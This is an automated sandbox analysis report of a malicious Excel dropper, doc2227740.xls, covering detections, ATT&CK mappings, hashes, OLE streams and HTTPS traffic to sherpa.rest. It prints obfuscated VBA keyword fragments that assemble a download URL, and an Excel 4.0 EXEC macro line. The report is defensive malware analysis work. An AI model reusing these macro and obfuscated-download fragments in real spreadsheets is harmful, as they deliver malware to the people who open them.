Analysis Report doc2227740.xls
Overview
General Information
Detection
Score: | 52 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Startup |
---|
|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
Initial Sample |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
SUSP_Excel4Macro_AutoOpen | Detects Excel4 macro use with auto open / close | John Lambert @JohnLaTwC |
JoeSecurity_XlsWithMacro4 | Yara detected Xls With Macro 4.0 | Joe Security |
Sigma Overview |
---|
No Sigma rule has matched |
---|
Signature Overview |
---|
AV Detection: |
---|
Multi AV Scanner detection for submitted file |
Source: | ReversingLabs: |
Source: | DNS query: |
Source: | TCP traffic: |
Source: | JA3 fingerprint: |
Source: | DNS traffic detected: |
Source: | Network traffic detected: |
System Summary: |
---|
Found Excel 4.0 Macro with suspicious formulas |
Source: | Initial sample: |
Source: | OLE indicator, VBA macros: |
Source: | Matched rule: |
Source: | Classification label: |
Source: | File created: |
Source: | OLE indicator, Workbook stream: |
Source: | File read: |
Source: | Key opened: |
Source: | ReversingLabs: |
Source: | Window found: |
Source: | Automated click: |
Source: | Window detected: |
Source: | Key opened: |
Source: | File opened: |
Source: | Initial sample: |
Source: | Process information set: |
Source: | File source: |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting11 | Path Interception | Path Interception | Masquerading1 | OS Credential Dumping | File and Directory Discovery1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Encrypted Channel2 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Exploitation for Client Execution3 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Scripting11 | LSASS Memory | System Information Discovery2 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Non-Application Layer Protocol1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Application Layer Protocol2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
21% | ReversingLabs | Document-Excel.Dropper.SDrop |
Dropped Files |
---|
No Antivirus matches |
---|
Unpacked PE Files |
---|
No Antivirus matches |
---|
Domains |
---|
No Antivirus matches |
---|
URLs |
---|
No Antivirus matches |
---|
Domains and IPs |
---|
Contacted Domains |
---|
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
sherpa.rest | 104.27.173.15 | true | false | unknown |
Contacted IPs |
---|
Public |
---|
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
104.27.173.15 | unknown | United States | 13335 | CLOUDFLARENETUS | false |
General Information |
---|
Joe Sandbox Version: | 31.0.0 Red Diamond |
Analysis ID: | 320290 |
Start date: | 19.11.2020 |
Start time: | 08:39:53 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 13m 34s |
Hypervisor based Inspection enabled: | false |
Report type: | light |
Sample file name: | doc2227740.xls |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of new started processes analysed: | 4 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal52.evad.winXLS@1/13@1/1 |
Cookbook Comments: |
|
Warnings: |
|
Simulations |
---|
Behavior and APIs |
---|
No simulations |
---|
Joe Sandbox View / Context |
---|
IPs |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
104.27.173.15 | Get hash | malicious | Browse | ||
Domains |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
sherpa.rest | Get hash | malicious | Browse |
ASN |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
CLOUDFLARENETUS | Get hash | malicious | Browse |
JA3 Fingerprints |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
7dcce5b76c8b17472d024758970a406b | Get hash | malicious | Browse |
Dropped Files |
---|
No context |
---|
Created / dropped Files |
---|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 144008 |
Entropy (8bit): | 0.30838800698977753 |
Encrypted: | false |
SSDEEP: | 48:I3cnqOA64MnlEManSj8QIAEYtUO/Xrm0RMGk8fB58cE8ny6Dn:Keqp0KMgSihIUO/bm0RMGk2B58cE8ys |
MD5: | A9B61ED0B8FF3555959ACA5EC1BBFBC6 |
SHA1: | E06D7B42CE25F326583F0B8C0420B5B8C29B7CEB |
SHA-256: | 5FA33B89DDA4C07247D5485C346C59140EDCC868A089497335179CDD2B6406A1 |
SHA-512: | 92C29C6114AB7F7AF5DB650768DEAC8D746F9D5C67C65B4BA7D149EAF5361C69F3D4ECC8EA0D71C56FB19C7D91920EF49F017B83379E6CD5FE0F0E2BBEC9176F |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 156816 |
Entropy (8bit): | 0.6706128002931875 |
Encrypted: | false |
SSDEEP: | 96:KBmuK829knn1P3RoIJxgTVbgZ/am5Ma01kP6WDkjk3XtbYkGQPx3:s2knnZm8gT5YJMyZRN |
MD5: | 537D8D39EC19606699121491C7BBC30F |
SHA1: | D812B3CFD45A37595012677015B45713ADBB491B |
SHA-256: | 27795C711CA0A573A9C132B940CE12C29BC219B9A9460BF1720742ADE2800F20 |
SHA-512: | A8A900864DB97C45CE98326CCD53F00086B339464C5EBB1D424C235B1E27DC0235E01561BB00301A13C6D61FC3E00E1ACEF1BA5A2CD8D19E9D342918E2F9618E |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 133 |
Entropy (8bit): | 4.285981450597859 |
Encrypted: | false |
SSDEEP: | 3:yVlgQPDRlgsRlzZP+0GrekSlWW3W6yX8lmlmhIf276:yPdPDDblztGrekS9W/kmYIf22 |
MD5: | 311D741FB8DADAA8776ED6B5E2798678 |
SHA1: | F6AB7EFC73F1FBB0A8A191FFE56883B349F732EA |
SHA-256: | 9A0AD1ED9C6DD6C327F2405DC5BCB23583600234EA73B05482CB878157FDF5B5 |
SHA-512: | B3278FFB306E9C91672D00D1C1E777D9C5B4AB115638C36EB6E6437979268057DE37393BE3E4B70261EAC2259621E77BE9B7386554833F85509C80CE812F59F4 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 144008 |
Entropy (8bit): | 0.3079160641624455 |
Encrypted: | false |
SSDEEP: | 48:I3NSYOXcjdFgaiEpZlGktDpXElXDu5y+VD6aWIpDZCnkrhD7xnvX2jugv5z9pSjG:K0YHSUZlDxEZu5N1pBAn0Z7M4e4z8 |
MD5: | F6B6E12BBADC43D1C575B6CF792D4FF1 |
SHA1: | A93623DA1281ECF637C69C765FA33EF66DA1F95A |
SHA-256: | A0179A17F0A8417184D6CA684BC79C8F6B4741E80D2BF178A3F9165EFDA26F35 |
SHA-512: | 605047A1185125E02941E45BBE71216FADA07A4AD4855D368EB67CE4C83263E86A99D73395384AFF7D42C563BD67C6B2910F089C395A560336F3BC335C5803E5 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 149973 |
Entropy (8bit): | 0.2785807174593322 |
Encrypted: | false |
SSDEEP: | 48:I38Z029GZvqKZ/a38Z/eysZbGdhITRkcPSc+W42ZcIwYPqSGqSUVZRCAyZL:KV2qq08a6khI8cEZA |
MD5: | 5288C191787983E4A9873ACFA314AC33 |
SHA1: | F282592FF1E3A8EBE3A2C1283086EDD923C14AA9 |
SHA-256: | F2EEFCD038500D7E36AAE3C95BF36E8E0729AB95636AF9138F63257D4DDD1275 |
SHA-512: | C5E3F399145CC35FA7140DEF751C681BFE0B1F59780F346C63AA59701C9E562DFBC20B166893BFACF4967E2B2C066F256CEDD6B23810EC3FDFD16D411932F634 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 133 |
Entropy (8bit): | 4.255906262627934 |
Encrypted: | false |
SSDEEP: | 3:yVlgQPDRlgsRlz/Kj83kl0QJKGqsIUnC700Z276:yPdPDDblzbs0QEGaUn1u22 |
MD5: | FC89710189E7C81130CAC40D0F180CCD |
SHA1: | BE07D37034D0D6E2394B5C3AC47F28EB78767E9E |
SHA-256: | D87C78CFD7A26F6649FA650118F9E464D73DB9EF1CB975817534018A60174F61 |
SHA-512: | A7E6559F09730EFF0004CB1A8300D962CEBCCC714D3018AD8600CEFB097040B96D5C2DC337AE82DEF42CEE705A6418A9333922DD4ED5FFABA3BD1BB1894A978F |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 49323 |
Entropy (8bit): | 7.7680995170984595 |
Encrypted: | false |
SSDEEP: | 768:h6sNvPeq3D7Q+pAiQxukc6/85Hv16i8745Cpp1HXSDBP+/TGkrTIdJ6YAYOpkjce:hL7dFE8h1A7gCprSVW/T9rkb6zYygce |
MD5: | AFD7B03C25F9C65F6470B21FEC9B9583 |
SHA1: | 9C1BABAE806C2E04A1B0BD782087E331437B677A |
SHA-256: | FA9D14B316C82357764F99BDD15D69CFE5AAEA4AE2D4293100A315915CCCAFFB |
SHA-512: | 9DE9522CF4B94755EB48D5E8B9B96FAA32113103A0513DFCD0346BB093E1D38A89CE570F1AB2E61FB6556BF22A21DF8AC9627F48D902A9B88C533C112934F75A |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 162688 |
Entropy (8bit): | 4.254390210877129 |
Encrypted: | false |
SSDEEP: | 1536:C6XL3FNSc8SetKB96vQVCBumVMOej6mXmYarrJQcd1FaLcm48s:CuJNSc83tKBAvQVCgOtmXmLpLm4l |
MD5: | 6F4AAED698A1513669A959E29DC5C6F2 |
SHA1: | 6A605C026EF516597E03EFE5FC9D397D7B91110F |
SHA-256: | D3059A80AFF09E691B3EEB371730DAFA842F171727C80BC3DCFF8CD1539D9631 |
SHA-512: | DA7BF949F91717644E0A32B1B843793F8C8C91ACA59722497966469ECA90E22D185BD4374E682EFCF860BFE7FDC3C1F201B1CC2E96B4B3C35119B23EDAEA86E2 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 137348 |
Entropy (8bit): | 0.05967248714825173 |
Encrypted: | false |
SSDEEP: | 12:I3DPBWR7OF2oO1fv8pAxnOB1PBWRKgOSSQaphOfP/7yPBWR/Nf4OdKp:I3NJTOMAROBHSOSqhO+SyOy |
MD5: | 6D4AB7FCCB2F8F79E152AF821B194F6D |
SHA1: | 49344E69BBA72212EE6FB40B48D2AE5D5833D328 |
SHA-256: | EDAAF11F25B09EFAA274FF72F2670913C6D7281356EC46A3738386063AAB7A3C |
SHA-512: | C8E2A22E66E947B8035DCAE7BE443F0DE1E18AFD6B3D50B7FF367607D0DD89F3A2BA473E00E3378A64C5758BFA0F58AEC57D541A93F8649E208AAC06D5B25665 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 137348 |
Entropy (8bit): | 0.0597466555271492 |
Encrypted: | false |
SSDEEP: | 12:I3DPgaoPe8CKfv8p6Gv1PgaoPD0DOJcSQapzvjp/7yPgaoPrBvKp:I3cn28u6Gvmn4WcqzrPndw |
MD5: | AD6ECCAAD220C6D4DF9762E3D64446AE |
SHA1: | BC04303DF31488C8606C4095BAAC160F99F3B240 |
SHA-256: | 18335078078CB0AAFAA80FE2ADF5FEBA72A5F6F2D017C694A920F555DD2C859B |
SHA-512: | 158B7B3D4F84A540FD9B25369A8791515FD790899BCD6C6485BE18FB3956A75AAB4719FFE777DE41406F9AE3DEE0BCCA1D58AD29A65AFE3A787F5D0187BCC95B |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 867 |
Entropy (8bit): | 4.478347873895743 |
Encrypted: | false |
SSDEEP: | 12:85Q0ZhCLgXg/XAlCPCHaXtB8XzB/rrCX+WnicvbjbDtZ3YilMMEpxRljKfkcTdJU:85RhU/XTd6j0YebDv3qekwrNru/ |
MD5: | B43C9756F00C7F10CE17BA5CD8CE8E70 |
SHA1: | AF18D1CFBA491DF5D31E6C1A3FB9BEAAF9A020CB |
SHA-256: | BDC1084BE45505EDC00E0700CA42282F52E624A0824D5AE85DFD03B9507A17B2 |
SHA-512: | 29434D36DF2736587A461D39BC96CB90D05E2CD06201D0CAC99BB16C11427F0104D6F637598E5469F939B7C85EA383A014803843FC9A074AA68FAB6E045BFEC1 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | modified |
Size (bytes): | 15 |
Entropy (8bit): | 3.906890595608518 |
Encrypted: | false |
SSDEEP: | 3:oyBVov:djy |
MD5: | CB81E25C045825270E2E97C347AE6E8F |
SHA1: | 2069CD47D19BCC5F24D31854972702CEC4C9E9A1 |
SHA-256: | FEC9B386E88BFD7FEC4BA72FDC006A003ECC079E2C204947A57872BB4ED7340A |
SHA-512: | C2EFAA0A03E287CDE5029DC00457A1A2D1D877649E88D5E27F462B5A4145B366D181239C77F101A09D61CD3C07AD9DAF8DEFAC2FE224625D63EEFF18B7044910 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 113 |
Entropy (8bit): | 4.380074810237285 |
Encrypted: | false |
SSDEEP: | 3:GmM/8XtF9BkGEQrQtOK7XcM/CQfzFQ/u3VT/n:XM/Af2QEfcQ5JRn |
MD5: | 62D6896587AF5C4E4AE819335D822CD0 |
SHA1: | 63F004900567837EB5D2C8C6412A7F8FED960279 |
SHA-256: | 02421F20DFDF6D7331D1CA21FBBE6CB0D69B5998023AA9094C8963D66F0B9B88 |
SHA-512: | E804B7AE4CE1FF2817EE9998501A04A16AF83DF81778FAE463CCB54B0E7305C12F8CFB73EE8DD41A4D441CE885D2255B3F4BB949DFB86CFDC22B73D564BF9409 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 4.360697246981449 |
TrID: |
|
File name: | doc2227740.xls |
File size: | 88576 |
MD5: | b43d8b40f9ef15965d0ff901e30c2f32 |
SHA1: | 3c0d89ac4b439b7cf60b6cc6e4195a8ce3514572 |
SHA256: | 196588a7404c90ab92502926afa24fbb25bf67c0ad50dba4f7ff4f1937816dda |
SHA512: | 57e42961b4ffe2b4233e05e8619a4dd59a9f00a7c68bf4cc57843cb6f3803c51c727287d9407c4787b5fb8be2caff1105e30abd4c82c9ccc3b335ff9e754c72e |
SSDEEP: | 1536:C3xEtjPOtioVjDGUU1qfDlaGGx+cL2QnAUA4duNxABg/geJtJSuAO1arCFsi:C3xEtjPOtioVjDGUU1qfDlaGGx+cL2QD |
File Icon |
---|
Icon Hash: | e4eea286a4b4bcb4 |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OLE | |
Number of OLE Files: | 1 |
OLE File "doc2227740.xls" |
---|
Indicators | |
---|---|
Has Summary Info: | True |
Application Name: | Microsoft Excel |
Encrypted Document: | False |
Contains Word Document Stream: | False |
Contains Workbook/Book Stream: | True |
Contains PowerPoint Document Stream: | False |
Contains Visio Document Stream: | False |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: | True |
Summary | |
---|---|
Code Page: | 1251 |
Author: | |
Keywords: | |
Last Saved By: | |
Create Time: | 2006-09-16 00:00:00 |
Last Saved Time: | 2020-11-18 06:47:39 |
Creating Application: | |
Security: | 0 |
Document Summary | |
---|---|
Document Code Page: | 1251 |
Category: | |
Thumbnail Scaling Desired: | False |
Manager: | |
Company: | |
Contains Dirty Links: | False |
Shared Document: | False |
Changed Hyperlinks: | False |
Application Version: | 983040 |
Streams with VBA |
---|
VBA File Name: Sheet1.cls, Stream Size: 5844 |
---|
General | |
---|---|
Stream Path: | _VBA_PROJECT_CUR/VBA/Sheet1 |
VBA File Name: | Sheet1.cls |
Stream Size: | 5844 |
VBA Code Keywords |
---|
Keyword |
---|
BackgroundQuery:=False |
TEXTJOIN(Delimiter |
.AdjustColumnWidth |
True, |
(Len(x) |
seconds) |
.WebConsecutiveDelimitersAsOne |
Public |
.WebFormatting |
Resume |
Mid(TEXTJOIN, |
"Range" |
ActiveSheet.QueryTables.Add(Connection:= |
While |
.WorkbookConnection.Delete |
False |
Wait(seconds |
"htt" |
www.TheSpreadsheetGuru.com |
xlInsertDeleteCells |
MakeWebQuery |
String, |
Cell.Value |
Excel |
"lol" |
String |
MakeWebQuery() |
Len(RangeArea) |
Len(Cell.Value) |
.Refresh |
Destination:= |
.WebSelectionType |
VB_GlobalNameSpace |
shFirstQtr |
Range |
.FillAdjacentFormulas |
"ps:" |
.PreserveFormatting |
.BackgroundQuery |
"info.p" |
.WebDisableDateRecognition |
Through |
RangeArea |
VB_Base |
Boolean, |
.WebSingleBlockTextImport |
.PostText |
Given |
VB_Creatable |
VB_Exposed |
Input |
Entered |
Integer) |
VB_TemplateDerived |
Empty |
(Timer |
Ignore_Empty |
.WebPreFormattedTextToColumns |
ParamArray |
.SavePassword |
'SOURCE: |
"info" |
Worksheet_Activate() |
Error |
.WebDisableRedirections |
Attribute |
'PURPOSE: |
VB_PredeclaredId |
Timer() |
VB_Name |
Private |
TypeName(RangeArea) |
CONCAT |
"//sherpa" |
Function |
Variant |
xlWebFormattingNone |
Len(Delimiter) |
VB_Customizable |
".rest/wp-" |
"pic" |
DoEvents |
'.RefreshStyle |
xlEntirePage |
swedr |
'Text |
"URL;" |
Delimiter |
.RefreshOnFileOpen |
.RowNumbers |
'Loop |
Variant) |
Replicates |
Worksheet_Calculate() |
TEXTJOIN |
.RefreshPeriod |
TEXTJOIN("", |
VBA Code |
---|
|
VBA File Name: Sheet2.cls, Stream Size: 977 |
---|
General | |
---|---|
Stream Path: | _VBA_PROJECT_CUR/VBA/Sheet2 |
VBA File Name: | Sheet2.cls |
Stream Size: | 977 |
VBA Code Keywords |
---|
Keyword |
---|
False |
VB_Exposed |
Attribute |
VB_Name |
VB_Creatable |
VB_PredeclaredId |
VB_GlobalNameSpace |
VB_Base |
VB_Customizable |
VB_TemplateDerived |
VBA Code |
---|
|
VBA File Name: Sheet3.cls, Stream Size: 977 |
---|
General | |
---|---|
Stream Path: | _VBA_PROJECT_CUR/VBA/Sheet3 |
VBA File Name: | Sheet3.cls |
Stream Size: | 977 |
VBA Code Keywords |
---|
Keyword |
---|
False |
VB_Exposed |
Attribute |
VB_Name |
VB_Creatable |
VB_PredeclaredId |
VB_GlobalNameSpace |
VB_Base |
VB_Customizable |
VB_TemplateDerived |
VBA Code |
---|
|
VBA File Name: Sheet4.cls, Stream Size: 977 |
---|
General | |
---|---|
Stream Path: | _VBA_PROJECT_CUR/VBA/Sheet4 |
VBA File Name: | Sheet4.cls |
Stream Size: | 977 |
VBA Code Keywords |
---|
Keyword |
---|
False |
VB_Exposed |
Attribute |
VB_Name |
VB_Creatable |
VB_PredeclaredId |
VB_GlobalNameSpace |
VB_Base |
VB_Customizable |
VB_TemplateDerived |
VBA Code |
---|
|
VBA File Name: Sheet5.cls, Stream Size: 977 |
---|
General | |
---|---|
Stream Path: | _VBA_PROJECT_CUR/VBA/Sheet5 |
VBA File Name: | Sheet5.cls |
Stream Size: | 977 |
VBA Code Keywords |
---|
Keyword |
---|
False |
VB_Exposed |
Attribute |
VB_Name |
VB_Creatable |
VB_PredeclaredId |
VB_GlobalNameSpace |
VB_Base |
VB_Customizable |
VB_TemplateDerived |
VBA Code |
---|
|
VBA File Name: ThisWorkbook.cls, Stream Size: 985 |
---|
General | |
---|---|
Stream Path: | _VBA_PROJECT_CUR/VBA/ThisWorkbook |
VBA File Name: | ThisWorkbook.cls |
Stream Size: | 985 |
VBA Code Keywords |
---|
Keyword |
---|
False |
VB_Exposed |
Attribute |
VB_Name |
VB_Creatable |
"ThisWorkbook" |
VB_PredeclaredId |
VB_GlobalNameSpace |
VB_Base |
VB_Customizable |
VB_TemplateDerived |
VBA Code |
---|
|
VBA File Name: UserForm1.frm, Stream Size: 2834 |
---|
General | |
---|---|
Stream Path: | _VBA_PROJECT_CUR/VBA/UserForm1 |
VBA File Name: | UserForm1.frm |
Stream Size: | 2834 |
VBA Code Keywords |
---|
Keyword |
---|
#FileNumber |
requirement |
Close |
Error |
VB_Name |
VB_Creatable |
/one" |
VB_Exposed |
xFileName |
FileNumber |
Empty |
String |
Resume |
Variant |
Output |
"c:\Users\Public" |
VB_Customizable |
#FileNumber, |
":jsoncronipont |
Replace("wsconroniponton |
"\Documents\" |
Range |
Dir(Path) |
Integer |
DelimChar |
VB_TemplateDerived |
False |
ThisWorkbook.BuiltinDocumentProperties("Keywords") |
Attribute |
Debug.Print |
Private |
VB_PredeclaredId |
VB_GlobalNameSpace |
VB_Base |
'Change |
FreeFile |
strFileExists |
VBA Code |
---|
|
Streams |
---|
Stream Path: \x1CompObj, File Type: data, Stream Size: 107 |
---|
General | |
---|---|
Stream Path: | \x1CompObj |
File Type: | data |
Stream Size: | 107 |
Entropy: | 4.18482950044 |
Base64 Encoded: | True |
Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 424 |
---|
General | |
---|---|
Stream Path: | \x5DocumentSummaryInformation |
File Type: | data |
Stream Size: | 424 |
Entropy: | 3.70704949759 |
Base64 Encoded: | False |
Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 220 |
---|
General | |
---|---|
Stream Path: | \x5SummaryInformation |
File Type: | data |
Stream Size: | 220 |
Entropy: | 3.13229188015 |
Base64 Encoded: | False |
Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 39260 |
---|
General | |
---|---|
Stream Path: | Workbook |
File Type: | Applesoft BASIC program data, first line number 16 |
Stream Size: | 39260 |
Entropy: | 4.61059933587 |
Base64 Encoded: | True |
Stream Path: _SX_DB_CUR/0001, File Type: data, Stream Size: 16815 |
---|
General | |
---|---|
Stream Path: | _SX_DB_CUR/0001 |
File Type: | data |
Stream Size: | 16815 |
Entropy: | 2.76744715124 |
Base64 Encoded: | True |
Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 826 |
---|
General | |
---|---|
Stream Path: | _VBA_PROJECT_CUR/PROJECT |
File Type: | ASCII text, with CRLF line terminators |
Stream Size: | 826 |
Entropy: | 5.15315553776 |
Base64 Encoded: | True |
Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 176 |
---|
General | |
---|---|
Stream Path: | _VBA_PROJECT_CUR/PROJECTwm |
File Type: | data |
Stream Size: | 176 |
Entropy: | 3.18343768922 |
Base64 Encoded: | False |
Stream Path: _VBA_PROJECT_CUR/UserForm1/\x1CompObj, File Type: data, Stream Size: 97 |
---|
General | |
---|---|
Stream Path: | _VBA_PROJECT_CUR/UserForm1/\x1CompObj |
File Type: | data |
Stream Size: | 97 |
Entropy: | 3.61064918306 |
Base64 Encoded: | False |
Stream Path: _VBA_PROJECT_CUR/UserForm1/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 291 |
---|
General | |
---|---|
Stream Path: | _VBA_PROJECT_CUR/UserForm1/\x3VBFrame |
File Type: | ASCII text, with CRLF line terminators |
Stream Size: | 291 |
Entropy: | 4.60170100243 |
Base64 Encoded: | True |
Stream Path: _VBA_PROJECT_CUR/UserForm1/f, File Type: data, Stream Size: 171 |
---|
General | |
---|---|
Stream Path: | _VBA_PROJECT_CUR/UserForm1/f |
File Type: | data |
Stream Size: | 171 |
Entropy: | 3.84288648278 |
Base64 Encoded: | False |
Stream Path: _VBA_PROJECT_CUR/UserForm1/o, File Type: data, Stream Size: 108 |
---|
General | |
---|---|
Stream Path: | _VBA_PROJECT_CUR/UserForm1/o |
File Type: | data |
Stream Size: | 108 |
Entropy: | 3.31418568251 |
Base64 Encoded: | False |
Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 4896 |
---|
General | |
---|---|
Stream Path: | _VBA_PROJECT_CUR/VBA/_VBA_PROJECT |
File Type: | data |
Stream Size: | 4896 |
Entropy: | 4.8370296249 |
Base64 Encoded: | False |
Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_0, File Type: data, Stream Size: 1828 |
---|
General | |
---|---|
Stream Path: | _VBA_PROJECT_CUR/VBA/__SRP_0 |
File Type: | data |
Stream Size: | 1828 |
Entropy: | 4.3476580333 |
Base64 Encoded: | False |
Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_1, File Type: data, Stream Size: 191 |
---|
General | |
---|---|
Stream Path: | _VBA_PROJECT_CUR/VBA/__SRP_1 |
File Type: | data |
Stream Size: | 191 |
Entropy: | 3.30829134406 |
Base64 Encoded: | False |
Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_2, File Type: data, Stream Size: 384 |
---|
General | |
---|---|
Stream Path: | _VBA_PROJECT_CUR/VBA/__SRP_2 |
File Type: | data |
Stream Size: | 384 |
Entropy: | 2.45306416855 |
Base64 Encoded: | False |
Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_3, File Type: data, Stream Size: 294 |
---|
General | |
---|---|
Stream Path: | _VBA_PROJECT_CUR/VBA/__SRP_3 |
File Type: | data |
Stream Size: | 294 |
Entropy: | 2.65487119554 |
Base64 Encoded: | False |
Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: MIPSEL-BE Ucode, Stream Size: 902 |
---|
General | |
---|---|
Stream Path: | _VBA_PROJECT_CUR/VBA/dir |
File Type: | MIPSEL-BE Ucode |
Stream Size: | 902 |
Entropy: | 6.58076213885 |
Base64 Encoded: | True |
Macro 4.0 Code |
---|
"=RETURN(EXEC(GET.WORKBOOK(36,DOCUMENTS(1))))",,=1+1
Network Behavior |
---|
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Nov 19, 2020 08:40:53.752295971 CET | 49165 | 443 | 192.168.2.22 | 104.27.173.15 |
Nov 19, 2020 08:40:53.781735897 CET | 443 | 49165 | 104.27.173.15 | 192.168.2.22 |
Nov 19, 2020 08:40:53.781933069 CET | 49165 | 443 | 192.168.2.22 | 104.27.173.15 |
Nov 19, 2020 08:40:53.806364059 CET | 49165 | 443 | 192.168.2.22 | 104.27.173.15 |
Nov 19, 2020 08:40:53.835467100 CET | 443 | 49165 | 104.27.173.15 | 192.168.2.22 |
Nov 19, 2020 08:40:53.839006901 CET | 443 | 49165 | 104.27.173.15 | 192.168.2.22 |
Nov 19, 2020 08:40:53.839088917 CET | 443 | 49165 | 104.27.173.15 | 192.168.2.22 |
Nov 19, 2020 08:40:53.839147091 CET | 49165 | 443 | 192.168.2.22 | 104.27.173.15 |
Nov 19, 2020 08:40:53.839207888 CET | 49165 | 443 | 192.168.2.22 | 104.27.173.15 |
Nov 19, 2020 08:40:53.850289106 CET | 49165 | 443 | 192.168.2.22 | 104.27.173.15 |
Nov 19, 2020 08:40:53.879415989 CET | 443 | 49165 | 104.27.173.15 | 192.168.2.22 |
Nov 19, 2020 08:40:53.879542112 CET | 443 | 49165 | 104.27.173.15 | 192.168.2.22 |
Nov 19, 2020 08:40:53.879632950 CET | 49165 | 443 | 192.168.2.22 | 104.27.173.15 |
Nov 19, 2020 08:40:54.129385948 CET | 49165 | 443 | 192.168.2.22 | 104.27.173.15 |
Nov 19, 2020 08:40:54.158127069 CET | 443 | 49165 | 104.27.173.15 | 192.168.2.22 |
Nov 19, 2020 08:40:55.589656115 CET | 443 | 49165 | 104.27.173.15 | 192.168.2.22 |
Nov 19, 2020 08:40:55.589684010 CET | 443 | 49165 | 104.27.173.15 | 192.168.2.22 |
Nov 19, 2020 08:40:55.589739084 CET | 49165 | 443 | 192.168.2.22 | 104.27.173.15 |
